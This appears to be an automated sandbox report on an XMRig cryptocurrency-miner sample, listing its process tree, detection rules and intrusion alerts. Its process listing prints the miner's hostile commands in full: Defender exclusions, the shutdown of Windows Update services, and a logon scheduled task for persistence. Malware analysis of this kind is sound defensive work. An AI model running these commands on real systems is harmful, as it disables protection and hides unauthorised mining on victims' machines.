Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
file.exe (PID: 7028 cmdline:
C:\Users\u ser\Deskto p\file.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343) dialer.exe (PID: 6996 cmdline:
C:\Windows \System32\ dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827) winlogon.exe (PID: 564 cmdline:
winlogon.e xe MD5: F9017F2DC455AD373DF036F5817A8870) lsass.exe (PID: 612 cmdline:
C:\Windows \system32\ lsass.exe MD5: 317340CD278A374BCEF6A30194557227) WMIADAP.exe (PID: 5900 cmdline:
wmiadap.ex e /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA) svchost.exe (PID: 740 cmdline:
c:\windows \system32\ svchost.ex e -k dcoml aunch -p - s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 904 cmdline:
c:\windows \system32\ svchost.ex e -k dcoml aunch -p - s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA) dwm.exe (PID: 992 cmdline:
dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7) svchost.exe (PID: 356 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 464 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1048 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s TimeBroke rSvc MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1064 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: 32569E403279B3FD2EDB7EBD036273FA) dxpserver.exe (PID: 2700 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ dxpserver. exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343) svchost.exe (PID: 1120 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1208 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1304 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1376 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s T hemes MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1384 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s EventS ystem MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1396 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s l fsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1496 cmdline:
c:\windows \system32\ svchost.ex e -k netsv cs -p -s S ENS MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1548 cmdline:
c:\windows \system32\ svchost.ex e -k appmo del -p -s camsvc MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1556 cmdline:
c:\windows \system32\ svchost.ex e -k local systemnetw orkrestric ted -p -s AudioEndpo intBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1564 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s FontCa che MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1664 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1716 cmdline:
c:\windows \system32\ svchost.ex e -k local service -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1724 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1796 cmdline:
c:\windows \system32\ svchost.ex e -k appmo del -p -s StateRepos itory MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1820 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: 32569E403279B3FD2EDB7EBD036273FA) svchost.exe (PID: 1828 cmdline:
c:\windows \system32\ svchost.ex e -k local servicenet workrestri cted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
powershell.exe (PID: 7000 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 7004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 6760 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 5952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) sc.exe (PID: 5976 cmdline:
sc stop Us oSvc MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 7068 cmdline:
sc stop Wa aSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 3172 cmdline:
sc stop wu auserv MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 5672 cmdline:
sc stop bi ts MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 5656 cmdline:
sc stop do svc MD5: D79784553A9410D15E04766AAAB77CD6)
powershell.exe (PID: 3804 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# iejbryoj#> IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /tn 'sethc' / tr '''C:\U sers\user\ AppData\Ro aming\Micr osoft\dxps erver.exe' '' } Else { Register -Scheduled Task -Acti on (New-Sc heduledTas kAction -E xecute 'C: \Users\use r\AppData\ Roaming\Mi crosoft\dx pserver.ex e') -Trigg er (New-Sc heduledTas kTrigger - AtLogOn) - Settings ( New-Schedu ledTaskSet tingsSet - AllowStart IfOnBatter ies -Disal lowHardTer minate -Do ntStopIfGo ingOnBatte ries -Dont StopOnIdle End -Execu tionTimeLi mit (New-T imeSpan -D ays 1000)) -TaskName 'sethc' - RunLevel ' Highest' - Force; } MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 3952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
powershell.exe (PID: 4500 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 95000560239032BC68B4C2FDFCDEF913) conhost.exe (PID: 3572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 868 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F) conhost.exe (PID: 496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) sc.exe (PID: 5164 cmdline:
sc stop Us oSvc MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 7008 cmdline:
sc stop Wa aSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 3360 cmdline:
sc stop wu auserv MD5: D79784553A9410D15E04766AAAB77CD6) sc.exe (PID: 1464 cmdline:
sc stop bi ts MD5: D79784553A9410D15E04766AAAB77CD6)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n | Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin | Florian Roth |
| |
XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) |
| |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth (Nextron Systems) |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) |
| |
Click to see the 14 entries |
Operating System Destruction |
---|
Source: | Author: Joe Security: |
Timestamp: | 192.168.2.6188.165.24.13149711802035420 06/09/23-13:30:16.918144 |
SID: | 2035420 |
Source Port: | 49711 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.6188.165.24.13149711802011341 06/09/23-13:30:16.918144 |
SID: | 2011341 |
Source Port: | 49711 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.6188.165.24.13149713802011341 06/09/23-13:31:25.852328 |
SID: | 2011341 |
Source Port: | 49713 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.6188.165.24.13149713802035420 06/09/23-13:31:25.852328 |
SID: | 2035420 |
Source Port: | 49713 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
- • AV Detection
- • Bitcoin Miner
- • Compliance
- • Spreading
- • Networking
- • Operating System Destruction
- • System Summary
- • Data Obfuscation
- • Persistence and Installation Behavior
- • Boot Survival
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Static PE information: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | File deleted: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Dropped File: |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | File read: | Jump to behavior |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | Code function: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | Code function: |
Source: | File written: | Jump to behavior |
Source: | File opened: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Persistence and Installation Behavior |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value modified: | Jump to behavior |
Source: | Process created: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | User mode code has changed: |
Source: | Module Loaded: | ||
Source: | Module Loaded: | ||
Source: | Module Loaded: |
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Code function: |
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Thread sleep time: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: | ||
Source: | Window / User API: |
Source: | Check user administrative privileges: |
Source: | Code function: |
